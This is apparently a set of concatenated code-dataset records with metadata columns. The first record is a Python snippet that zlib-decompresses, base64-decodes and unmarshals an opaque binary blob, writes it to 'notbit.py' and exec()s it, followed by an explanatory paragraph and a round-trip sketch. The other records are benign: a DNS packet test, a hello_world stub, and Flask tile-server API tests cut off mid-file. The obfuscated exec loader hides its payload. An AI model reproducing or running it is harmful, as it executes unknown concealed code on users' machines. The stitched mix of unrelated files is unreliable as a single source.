9\xc2\xfe\x07\xf2\x07pip\xd9\xbcX\xe2]u\xc2\xe6ac=\xa9\x19K\x9c\x1b5c\xd5M\xc2"\x92\xdc\x8b\x16\xb1\xd8\xc5\xb3\xa4\xf8\xe3\xd8\x89\xbaRI\xe0G\x07\xe2{\xe0\xdb\x97\xa1j^\x88\'\xb2\xbd\xa6\xd9\xef\xec\x1d\x17\xe3\n\xf1\xbb\xaf\xe7\xd5\xc3\xefC\xe2\x17\x06\xfcU\xb5\x81\x7f\x92L1\xb5\x86\xcf\x92_\x10\x9e\xe7\x88A\xec+o>\x13\xfe\xcd\xc9_\xfc\x8e\x99\x04,&\x1d\x16O\x88a\xc4\x07\xc5\x0e\xcf\xab\x8f\\\x1aX\xdb\xd4\xa2\xf0\xcdk\xfdI>\t[\xc2W\x90\xd7\xf5F^\x97\xea\x03\xd4\xcf\xc9\x898\xba\xef\xc8u\r`P\\\x9b\xa8\x0bi\x1dI$i\xe0\xb8\xed:\x0f\xa8\xb7\xa8\x1e\xcd\x19\xbf\x9d\xd0s\x8d\xf7I\xc7\xa9P\x9bP<&\x0b\xd4#\x11l\xfa\x9e\xde\xe4\xfa\xcc\xf2\'\xf3\x17^Kv\xf6\xa8\x9f\xba\xc5\x12\xf5\x1cj\x12V\x9f\xaf\xec\xe4\x0f\xaaQY\xdc\x14\xdd\x046\x979g\x7f\xc2s\xb0F\x8e_\xd3U\xe0Y\xa5\xd7\xe1\xb5l\x8d}>\xb8\xf0x&\xd2\xdc\xbdr\x8e\x1a\x11v9\xf8U\xef\x18q\xbc\x89\x89\xb3\x00_\x0f\xbez\xcbELm.8s\xa6\xaf\t\xb7\xd7\x1c\xf5\x15\xf1\xf5\xeb\xf8V\x06\xed\xfd\x93~B\x9aKCm\x08\xfb/\xdc(\x1f>\xe03p\xae\x1cu\xfc-\xec(0<\x9c\xd4>\xadQ\x9dg"\x96\xf9o5o\xd9\xf8\xb0\x81?\x18\xd3\\=\xe2\x05>t:*\xe4\xc3Pw$\xfa\x0c\xdf}\xf7\xbd\xc8j\xe7\xd3-\xd8|\x8a\x1a\xf9q^\xe4\xd4\xc2:\x06.\xf4p\xa9\xeb\x0b\x9b\xd9\xef.\xe7\xf0\xbdQ,\xc3\xcf\xeb9\xa8\x16\xac\xd7I\x8f\t]m}`\xf3\xc2=\xaf"O\xc90\x1f\xab\xa3|\xcfg:x\xf6;\x8f\x11\x8a\xd7i7\xd4\xe7\x9bgc\x86\xe0\x8e\x88c\xc2z\'\xd4Q\xd7\xea\xcelI=\x9e~\xdb\xf3\xe0\xb16a\x98B\xbe\x8d\xdawZ\r1f\xe9\xa2\xae/\xb4\x9d\xd7qN\xac\xdfaw[\x1b\x8c\xd4\x08u\x95\xb2\xfbp\xe4=t\xfc=\xf2z\xe5\x10z\r\x8aI\x1c\r\xf2\x13\xe33E^B\xe7\tt&\xf2\xb9\xe7\x87\xa0\xcdG\xdd\xc7\xf7\xb7\xc0\x9e\x8b\xa1\x01C\xf4s\x17u*b\xaa\x9b\xcf\\\xadZb~\x86i\xd0\x93J6P\x811\xb5\x1e\xa9_\xf4\xc3u\x96\\\x1e\xe2\x0bx\xb4\x17C\xb5[Q\xff\x82prT\x98"\xf6JuA0\xd6\x84\x03\xf5D\xb8.2\xd3\xe8<\xce\xd3\xea\xeb\x80x<\x05\x83|\x15\xd4k\xc3\x1c\xc7\xa8\xc3e,J\xcaY\xc8\x97"\xe1mW\x0c\x8b\x13\xb3/\xf3\xfdIc/\x92}\xc5\xd4\x19|\xcf\xe7\xfe\xc0\xc6<\x8bAS\xbc\xf5\xe1(_\x94\xd6\x96\xf49J_J\xaai\x9bw)\x7fC\x9f\x17\xf8\xb8\xb0\xd4\xe7T[\xec1\xd7\x11\xb6\xbdYKf\x0e\x07\xf7=\x10\xea\xa7\x00\x8b\x05\xafs\xed\x97\x0c\xa9\x7f\x82\x9a\xe3\xbe\xa7\x92\x90\x9cm\xa3\'\xe0?b\xd9\x02\xfe\x93}\xfb\x84o\xaa\xefR\xdd\x9d\x17\xa8\xcfg\x01\xf43\x1cP\xdf\xe5\xae\x97\x05.\x12m"]\xdcQ\x1e\xa0\xf7C\xce}j\x1d\x81\xb3\x0f\xa6\x883&\xef\xc4\xf6\xe3\xc8\xe4\xcf\xc9\xa8\xf0ak(S\x9an\xa34\xdc\x19\x83\x1d\xf5%\x11o\xe3\xf2=\x8d\xca\x91g"?i\xe0H\x88Y;\x92\x87\x8d\xde\xeb8\xabu\xf4\xb6\xf0\x14a!%\t\xf2~N5\x05\x9e\xec:?\xf5g\xaekXzc\x9e\xb7\xfa]\xe4\x86&^X\xccp\x9c\x066\x85R\xb4\xc2\x9e\x81\xbfI\x8b{S\xc6\x13\xa3\xa7s\x19v\xf8\xc8\'J\xe0\xd5\xf7\xa5\xa7\x9c\x98\x8du-\x0b\xab\x97\xc3(\xaf9\xde\xa4\x99\xf3\xc6\x97\xea\xbd\xb0\xfa\x05\\&\xd2\x93\x1c\xb9\x172z\xd7\xf1\x9frT2@\xed\xa0\x82[\xbc\x01\'v\x8bB[/\x85\x9a\x93\xe4\xb0\xbd\xe7\xc0\xfe\xa89\xe2\xeb|\xe0\x0by\xb8\x16a\xf73\xf5\xb2\x10\xe3\xdd<PO7k\xca\xd9\xfe\x91#\xe5\x16\xaf\xaeq\xbe\xf5\xef\xc72;~s\x7f"\xae\x9c\xbb\xb8:#\xae\x98\x8c\x9b5\xa2\xb6\xe0\x1c\xa3\xcd1u\xadF\xbdh`u\xd6\xd4\xaf4fr\xcd\xd7\xc8\xfbI\x1eQ~\x1d\x8c\x0f\xb3\xc2\xe9\\\xf9rB8/\x84\x97O\xfb\x8eY\xcd(\x89\xf0\xc3PvP\x1f\xf9v\xc6|\x17\xd8\xd9\r\x8aq\xcc\xfb\xccQB\x98\x0f\xac\x15\xc3r\xbc\xa9\xf5\xc29/\xf4\xd5\xe0\xd3-\xc6\x83\x1fw\x10\xef\xbcG9\xe1|\xc9\x14\x19\'\xcd\xa9\x06G\x9dQr>}\x83\xdd\xb5/\xfc 
o_\xeb\x1a}Q\xde\xf7\x9a\x9fs\x00\xf8\x94\n\xdf\xc0~\xad\xbc\xe1\x85L\xb7\xf6X\x06\xd7\xe4\x8f\xad\xcc8\xd7i\xfa\x8bJ\xda\xbc\xc3d\x08\xd7\xfc\r\xae_\xef\x7fz\x19e\xdd<\x12\xda\xf5oH\xaf\xd0\xbdL\xd8K}>p\\\xec\x93\xfa\xc39\xeb\x81P,|s\xa6U\xe4\xce\xb7,\x96m\xeb.\xb7\x82\xf7\xae\x811\x14\x83\xed\xfc\x0f9\xd64\xda=3\xfe\xc5\xed\x8d<\xb0\xf0(f\x9d\x17\xaa{\x88/0}\x0b\x9a\x84x\xd9-\\s\x07\x0cme\xd2\xb9G\x90*\xad\xdd\xde\xe3:&m\xeb\x07\x18p\xd3\x1bz\xd0=\xea\xc5\xf2s]\xc9e\xde\xd4`\x8d\xdd\xa9\xdf\t\xae\x9c\xfd2\xceB\xbc,r)\xa72<\xf9\x07\xfe{\x83i\x83)\xf5"X\xce\xfa\x1b~|\xc3?k\xae[\xafae\x7f\xc17\x81\x03\xb3\xe2\x15u\xa4L\x1c\xbbbgOz\x9e\xfd2\x0c\x00\xef\xf2:|\xceG\x9f\xbc\xe2\xe3\r\xc7(\xcd$\x12e\x96\x87[n\xa7F\xc8\xa1f\xf5\xc1\xce\x1a\x10+\xc8\xd3T+2\xae\x04\xf9\x86~\x06\xaeQ=\xa9\xc0o\xe1\x17\xe0\xdeK\x17\xf5|#\x7f\xb6\xa9q\xf1/\xe5\xaa\x9f\x9c\xebk\x1fn\xea\xcf\xbbs\xb6\x1ak\xdc\xb93\x9e\xf5e\x8f\xf5pE+\x0f\x8a)\xe91n8<r\x15\xfcS$.\xf9\xb5\xfc\'\xb5\x17t\x98y\xd7X\xdf|\xc2\x145l\xea\x8c\xf2\xce?\\\x92\xffkk\x02\xf0\x89g\xf5\xc0\xcf\xf8\xc5\x01\xb5.0!\x8cI\x0e\xf8\xc2\rn\xfd\x8f\xf9\x00j\xc6y\x0c\x0c\xca\xb9\xfd\x81\xdd\x15\xd3\x13\xbe\xf3\x93%\xb0qQ\x9c\xf3\x1fa\x99\xcak^\xc4\xb4"R=;g\xe7q\xd4w\xe9v\r}\x9f\x7f\xd8\xacf\xcf?\xf4\\\x00.\\\xb9\x8e\xeb\xbc\xc0N\x9b1\xeb\x998\xbb%\xc3z\xde\xff\x00\xe6@7m_\xe3\xec1\xdd55\xf3\xb5\xa7\x02\xde\xc0\xfb\x94m\x1fG\xcc}\xd5hr\xdc\xdb\x12\\l\xc9\xcf\xb3y\xbdn7gv\xc6\x95\xf3\r\xac\x13\xf2\xdf\xd6/\xf2\xdc\xef\xfd\xb7\xdf\xf1\xff\xa1\xdfq\x87It\xbe@\xfe~\xedml\x1b\xfb\xc2\x87\x1a\x0eD\xb9`\x0f\xff\xcc\x0c\x95\xce\x11\xa6\x17\x9e\x0b\x88\x03R\x9f\xa3\xc6\x93\x92\xc9]]c<\xf9\x94W\xcc\x8a\xbf\x7f\xd7\xc7\xb8\xd6\xea\x9c\xe3\xb3\xbe>\xec1\xff\x0fq,W\xbb| \xbfQ\xbd\x82\xd8\xf8\x17;o\xe9\xf0^\xca?\xc0+\xb2_\x072\xc0\xc5\xfbWlb\xf1\xff%^\xb5\xb8\xca\xf2H\xf5\x9f\xae\xfb\x9f\xe2#F;\xf6LUz\x1f\xad\xee\xce\xcc_\xc0;\x9a\x9au\xd8\xd6\x8dj\xf8[\xcd\x15\xef\xd7~ij\xf4\xdb=\x91\x7f\xd6\xf75l\xca_Z\xb5\x90\xe2M\x98F\xac.\xf2\xd4\xd7\xcd(\xdd\xfc6tN\x90y\x8a[?a\xeb\x0b\xb7\xa3"\xaaX}\xfd\xd6\xaf\xd7\x01_\xd0\xdb5\xb0\xde\x02\xe9\xf5\xe1\xbd\xb6~\xbd\xf9\x9e\xc5\x0e\xbf\x071\xa7~\x1bt\x86\x98\x1f\x18%b|\xef;\xa7\xe3P}\xf9\xd7\xb7*+\x81\x0f\x0f6\xc9\x0e\xc0\x98c\x04\x8e\xc8\xb0\xfa\xa6>}\x16[~\xda\xe6P\x16_\x93\xc1\xfeA\x1f\x8e|\x9f\x07\xfe<\xcf?\xee\x83\xf7\x03\xb9\xbf^k\xe7MS/_\xfd\x90\xf7\x02\xf99G\xe3{\xf5\xb8\x9f\xe4\x87\x8f6\xfd:\xb6&\x8f\x1c\x91t\xdd\xcd}M\xc6{\xb2HgG\xf7\\\x9bt\xc08\x14\xf8\xd6\xf3~\x14auk\xd3G\xcc\xa1\xbcWF\x98\xe3\x06w\xbc\xf1gn\xa47s\xdc\xf9\x19\xd3\xe7]\xef\xf6S]\xad\xedY\xfd\xf5\xeb\xf0\xa8\xae\x89\xa8\x9f*\xb2\xfc\xf0\x0f0\xc9\x0f:\xf3v/_\xd6x?\xe0\xb2S\x11\xbc\x89\xe7\xa3\xcfu%\xe7St\xae\xf7E?\xbc\xcd#\xef\xc8\xe3{\xfa\x9d\xf5}N\xbfL\x97\x87@\x94\x89\xcf\xfd\xfd\xfaN\xfa\x9a\x17\xfe\x1d}\xb6w;D\x0b~kv\xd9=/:\xaf\x02\x8f 
.\x1a\x10_G\x0c\xf2\xfe\x18\xb8E\xa1m\x03]K\x03\xdd\xf9\xa1\x9e\xb9/\xf0\xb3\xc0\xa1\x1aMX/\xb2\xa23\xb4,^Jt\xafa\x8a}0\xce\xd9\xf4T\xf9{\xd7\xfbH\xa6O5\xcf\x97\xe7n\xe6W\xe7n\xd5\xd7\xe7n\xf9#o\xa2\\p\xbd\x13F\xdc\x96\xf5vYo\xfe\xc0\xcfc\xc7\x87\x10\x98\xb3T\xbb\xc4\x99/\xb0\xfd\xc6\xa0\xfei\xc7\xa23\xd5\xb4\x8d\x01\x8c\x0b\xdc}\xb6\xf4\x8c\xfb\xdf\xe9,U\xed\xc5\r\x07\x06\x97=\xb0\xbb\x02l\xff5\xe6Q,\xbb\r\xfe\xd1\x99\xf2\xf5\xae\xc7\xa4\xc6\x15\xe8\xb0\xe5\xa7#~\xf7\xe4q/\r\x7f\xe4\x98\xe2)[\x0f\xbe\x1aJ\xf1\xf6\x0bn\xc4\xf9\xc5\xe0\x91_3=\xed\xb9\xfd>\xe5\x02vG\x92\xf2J\x8bQ^{g\xee\r1Q\x91l\xaa\x15\x10\x0b\x84\xad\xbf\xdf\xf2\xc0\x89\x98+\xb7}1\xea-\x87XG\x93\x87\x86\x03\xc6/E\xe4C\xba\x1b\x07?\x16\xb6_\xd7:\xcf\xb8C|wN\xb6,d\xc6\x0b\x1a\xae\xf8\xf4\xac\xeaZ\xfb\x82{n\x8f\xc8\xdf\x7f\xffL\x8c\xbf_\xde\xe2\xb7\xcd\xd7\xc0\xce\x06Z\x9c\xff\xdf\xc7%\x19n\x07\x9eC\xf7n\x98\xcc/\xb1\xc6\xbd\xe1ld\xc3\xfaN(qq\xaca\xbdT\x93\xaa\xee\xb1\xee#\xba\xdf\xa03\x9d\xc5\x135>\x0c\xd7t\xf7\x8d\xe1\x02\xb0\xe7\xa5\xe4wok}\xdb]\xc4\x83\x0c^\xc9\xb1\xe1\x07|\x87\xdd\xb9`\xfd\xaf\xbe\xf2\xc7cn]\xd9\xf5\x1d\xc8[\x1e\xf9#;=\xc9\xf1\xc3>\xad\xb9\xdb\xde-\x99\x17\xce9rI7\xc9#/\xd9\xfe\xc9Z]\xdf3\xb7~\x99\x137\xbb\xc3\xc1z}tO\x80\xddg\x01v\xf2\xf3%Zg\xd1\x9c\x9d|\xf2\xd3\r\xdd\xff\xa6\xfbT\x13I\xdb\x05\xba\x89\x9an\xafp\xfc4\xed\xf6^r\xaf9\xdbSr\xe0\xc6\'\xdfj\xb8\r[\xab\x94g\xcf\xce\x0en9\x10\xd5\x02\x8b\x99\xd8\xe4\xe3\x9f\xaf\t\x1c\xe1\xc0d\xd4{\xe7\xfd\x9b&N9\xbe\xd4\xfd}\xc6a\xeb\x1e\xff\xaf;O&\x1dk\xf2&\xa0Z\xb9\xaa\xb9\xa9\xda\xf4\x10\xfeJ\xaf\x9b\xf2I\xaft\xc17\xc1\xfb\xc4\x90\xdd\xeb\x98&\x1f_\xf7\x8d\x18\xee\x92\x0f\x03\xc3\xc1\xf5\xcd\xcb\xb3Z\x81\xee\xd5\x04\x14+\x1d\xba_\xc6\xea\x05~\xd7\x97\xf8\x15\x9d\xd5\xdd\xdc\xb3\x7fR\xbb|\xdd\x9b\xca"{:w\x9a\xbb\xf7\xb3\xc8\xb5\xd6\xecN\xb1\xadL\xd8|T\x17s\xbf\xfb\x83\xfd%\xbc\x15k\xfdt\x84\x9b5\xd0]d\xc6\x85\xff\xcb\xc9\xfe\xefp\xb2\x8b\x7f\xd7\xff\x8bS\xee\xd79\xf9&\xf5f\xc0\x9b\xa6\x9b\xfa\xdc\x1c\x7f\xad\r\xf9!\xefg6\xf7\xe6^\xe2i}\x1f\xbd\xe6e\xac\x1f\xa9\x92\xde\xe3\'\xb9\xb7t\x90\xc3\x10Wz\x0e\xfbN\xb7\xa1\x84\x98\x05>/`\x07_e\xfcf\xc8k<p\xae\x8as\x94\xdaWV\x81.\x1f\x913\xb6\xc0"1\xc8\x89\x93\x00C4:\x83\x17Ot\xdf\r>\x0fn\x90\x1f\x86j\xb6\xfd7\x0f\xc0\xa6&'
val = zlib.decompress(data)   # `data` is the zlib-compressed blob above
val = bs.b64decode(val)       # `bs` presumably aliases the base64 module
val2 = ms.loads(val)          # `ms` presumably aliases marshal (or pickle); yields source text
fw = open('notbit.py', 'w')   # dump the recovered source to disk for inspection
fw.write(val2)
fw.close()
exec(val2)                    # then execute the recovered source
print('done')
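The unpack chain above (zlib, then base64, then loads, then exec) is easy to reproduce for study. A minimal round-trip sketch, assuming `bs` and `ms` alias the standard `base64` and `marshal` modules (the aliases are not visible in this record, so that is an assumption):

import zlib, base64, marshal

source = "print('hello from the payload')"
# pack: serialize the source text, base64-encode it, then zlib-compress
blob = zlib.compress(base64.b64encode(marshal.dumps(source)))
# unpack mirrors the snippet above
recovered = marshal.loads(base64.b64decode(zlib.decompress(blob)))
assert recovered == source

Writing the recovered text to 'notbit.py' before exec, as the snippet does, at least leaves an artifact to inspect; executing an opaque payload like this is exactly the pattern to treat as hostile.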
| 834.235294 | 13,981 | 0.733042 | 3,252 | 14,182 | 3.187269 | 0.278905 | 0.001737 | 0.001737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21533 | 0.001904 | 14,182 | 16 | 13,982 | 886.375 | 0.51692 | 0 | 0 | 0 | 0 | 1.083333 | 0.777535 | 0.776336 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
dbf72e3ca9c0760ca6777e329e27075106a7a7eb
| 73 |
py
|
Python
|
pyfinancials/engine.py
|
kmiller96/PyFinancials
|
73a89b0fd3a3d501b8f8c770f73473e9a2d18fdf
|
[
"MIT"
] | 1 |
2019-02-09T21:28:27.000Z
|
2019-02-09T21:28:27.000Z
|
pyfinancials/engine.py
|
kmiller96/PyFinancials
|
73a89b0fd3a3d501b8f8c770f73473e9a2d18fdf
|
[
"MIT"
] | null | null | null |
pyfinancials/engine.py
|
kmiller96/PyFinancials
|
73a89b0fd3a3d501b8f8c770f73473e9a2d18fdf
|
[
"MIT"
] | null | null | null |
def hello_world():
"""Tests the import."""
return "Hello world!"
| 18.25 | 27 | 0.60274 | 9 | 73 | 4.777778 | 0.777778 | 0.465116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.219178 | 73 | 3 | 28 | 24.333333 | 0.754386 | 0.232877 | 0 | 0 | 0 | 0 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 |
0
| 6 |
dbfd1a602dd992f412e1700c617d5bbf9b239826
| 505 |
py
|
Python
|
tests/test_dns.py
|
jensstein/mockdock
|
4eec294f33d929d361973c1708d2aa856a9900a0
|
[
"MIT"
] | null | null | null |
tests/test_dns.py
|
jensstein/mockdock
|
4eec294f33d929d361973c1708d2aa856a9900a0
|
[
"MIT"
] | 6 |
2020-03-24T16:45:10.000Z
|
2021-02-13T10:03:53.000Z
|
tests/test_dns.py
|
jensstein/mockdock
|
4eec294f33d929d361973c1708d2aa856a9900a0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import unittest
from mockdock import dns
class DNSTest(unittest.TestCase):
def test_build_packet(self):
data = b"^4\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x06google\x03com\x00\x00\x01\x00\x01"
packet = dns.build_packet(data, "192.168.0.1")
expected_result = b"^4\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00\x06google\x03com\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\x00\x00<\x00\x04\xc0\xa8\x00\x01"
self.assertEqual(packet, expected_result)
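The hard-coded byte strings follow the DNS wire format: a 12-byte header, then length-prefixed name labels. A minimal sketch (a hypothetical helper, not part of mockdock) that recovers the queried hostname from the request bytes used above:

def parse_qname(data: bytes) -> str:
    """Extract the question name from a raw DNS packet (the header is 12 bytes)."""
    labels, i = [], 12
    while data[i]:
        n = data[i]
        labels.append(data[i + 1:i + 1 + n].decode())
        i += n + 1
    return ".".join(labels)

# with the `data` bytes from the test, parse_qname(data) yields "google.com"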
| 38.846154 | 168 | 0.708911 | 89 | 505 | 3.966292 | 0.41573 | 0.23796 | 0.203966 | 0.169972 | 0.373938 | 0.373938 | 0.339943 | 0.339943 | 0.23796 | 0.23796 | 0 | 0.237557 | 0.124752 | 505 | 12 | 169 | 42.083333 | 0.561086 | 0.041584 | 0 | 0 | 0 | 0.25 | 0.47619 | 0.453416 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
e02820e74734d672d90f15bf093da7319a0c92ba
| 12,815 |
py
|
Python
|
tests/server/test_flask_api.py
|
YuhangCh/terracotta
|
867ba5f7425fa88881f4c161d81cc7311f4f9c4e
|
[
"MIT"
] | null | null | null |
tests/server/test_flask_api.py
|
YuhangCh/terracotta
|
867ba5f7425fa88881f4c161d81cc7311f4f9c4e
|
[
"MIT"
] | null | null | null |
tests/server/test_flask_api.py
|
YuhangCh/terracotta
|
867ba5f7425fa88881f4c161d81cc7311f4f9c4e
|
[
"MIT"
] | null | null | null |
from io import BytesIO
import json
import urllib.parse
from collections import OrderedDict
from PIL import Image
import numpy as np
import pytest
@pytest.fixture(scope='module')
def flask_app():
from terracotta.server import create_app
return create_app()
@pytest.fixture(scope='module')
def client(flask_app):
with flask_app.test_client() as client:
yield client
def test_get_keys(client, use_testdb):
rv = client.get('/keys')
expected_response = [
{'key': 'key1'},
{'key': 'akey'},
{'key': 'key2', 'description': 'key2'}
]
assert rv.status_code == 200
assert expected_response == json.loads(rv.data)['keys']
def test_get_metadata(client, use_testdb):
rv = client.get('/metadata/val11/x/val12/')
assert rv.status_code == 200
assert ['extra_data'] == json.loads(rv.data)['metadata']
def test_get_metadata_nonexisting(client, use_testdb):
rv = client.get('/metadata/val11/x/NONEXISTING/')
assert rv.status_code == 404
def test_get_datasets(client, use_testdb):
rv = client.get('/datasets')
assert rv.status_code == 200
datasets = json.loads(rv.data, object_pairs_hook=OrderedDict)['datasets']
assert len(datasets) == 4
assert OrderedDict([('key1', 'val11'), ('akey', 'x'), ('key2', 'val12')]) in datasets
def test_get_datasets_pagination(client, use_testdb):
# no page (implicit 0)
rv = client.get('/datasets?limit=2')
assert rv.status_code == 200
response = json.loads(rv.data, object_pairs_hook=OrderedDict)
assert response['limit'] == 2
assert response['page'] == 0
first_datasets = response['datasets']
assert len(first_datasets) == 2
assert OrderedDict([('key1', 'val11'), ('akey', 'x'), ('key2', 'val12')]) in first_datasets
# second page
rv = client.get('/datasets?limit=2&page=1')
assert rv.status_code == 200
response = json.loads(rv.data, object_pairs_hook=OrderedDict)
assert response['limit'] == 2
assert response['page'] == 1
last_datasets = response['datasets']
assert len(last_datasets) == 2
assert OrderedDict([('key1', 'val11'), ('akey', 'x'), ('key2', 'val12')]) not in last_datasets
# page out of range
rv = client.get('/datasets?limit=2&page=1000')
assert rv.status_code == 200
assert not json.loads(rv.data)['datasets']
# invalid page
rv = client.get('/datasets?page=-1')
assert rv.status_code == 400
# invalid limit
rv = client.get('/datasets?limit=-1')
assert rv.status_code == 400
def test_get_datasets_selective(client, use_testdb):
rv = client.get('/datasets?key1=val21')
assert rv.status_code == 200
assert len(json.loads(rv.data)['datasets']) == 3
rv = client.get('/datasets?key1=val21&key2=val23')
assert rv.status_code == 200
assert len(json.loads(rv.data)['datasets']) == 1
def test_get_datasets_unknown_key(client, use_testdb):
rv = client.get('/datasets?UNKNOWN=val21')
assert rv.status_code == 400
def test_get_singleband_greyscale(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_extra_args(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?foo=bar&baz=quz')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_cmap(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=jet')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_preview(client, use_testdb):
import terracotta
settings = terracotta.get_settings()
rv = client.get('/singleband/val11/x/val12/preview.png?colormap=jet')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def urlsafe_json(payload):
payload_json = json.dumps(payload)
return urllib.parse.quote_plus(payload_json, safe=r',.[]{}:"')
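# For illustration: urlsafe_json({"a": [0, 1]}) -> '{"a":+[0,+1]}' --
# quote_plus keeps the JSON punctuation listed in `safe` and encodes spaces
# as '+', so colormap payloads survive being embedded in a query string.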
def test_get_singleband_explicit_cmap(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
explicit_cmap = {1: (0, 0, 0), 2.0: (255, 255, 255, 20), 3: '#ffffff', 4: 'abcabc'}
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit'
f'&explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 200, rv.data.decode('utf-8')
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_explicit_cmap_invalid(client, use_testdb, raster_file_xyz):
x, y, z = raster_file_xyz
explicit_cmap = {1: (0, 0, 0), 2: (255, 255, 255), 3: '#ffffff', 4: 'abcabc'}
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?'
f'explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 400
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=jet'
f'&explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 400
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit')
assert rv.status_code == 400
explicit_cmap[3] = 'omgomg'
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit'
f'&explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 400
explicit_cmap = [(255, 255, 255)]
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit'
f'&explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 400
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit'
f'&explicit_color_map=foo')
assert rv.status_code == 400
def test_get_singleband_stretch(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
for stretch_range in ('[0,1]', '[0,null]', '[null, 1]', '[null,null]', 'null'):
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?stretch_range={stretch_range}')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_out_of_bounds(client, use_testdb):
import terracotta
settings = terracotta.get_settings()
x, y, z = (0, 0, 10)
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
assert np.all(np.asarray(img) == 0)
def test_get_singleband_unknown_cmap(client, use_testdb, raster_file_xyz):
x, y, z = raster_file_xyz
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=UNKNOWN')
assert rv.status_code == 400
def test_get_rgb(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/rgb/val21/x/{z}/{x}/{y}.png?r=val22&g=val23&b=val24')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (*settings.DEFAULT_TILE_SIZE, 3)
def test_get_rgb_preview(client, use_testdb):
import terracotta
settings = terracotta.get_settings()
rv = client.get('/rgb/val21/x/preview.png?r=val22&g=val23&b=val24')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (*settings.DEFAULT_TILE_SIZE, 3)
def test_get_rgb_extra_args(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/rgb/val21/x/{z}/{x}/{y}.png?r=val22&g=val23&b=val24&foo=bar&baz=quz')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (*settings.DEFAULT_TILE_SIZE, 3)
def test_get_rgb_stretch(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
for stretch_range in ('[0,10000]', '[0,null]', '[null, 10000]', '[null,null]', 'null'):
rv = client.get(f'/rgb/val21/x/{z}/{x}/{y}.png?r=val22&g=val23&b=val24&'
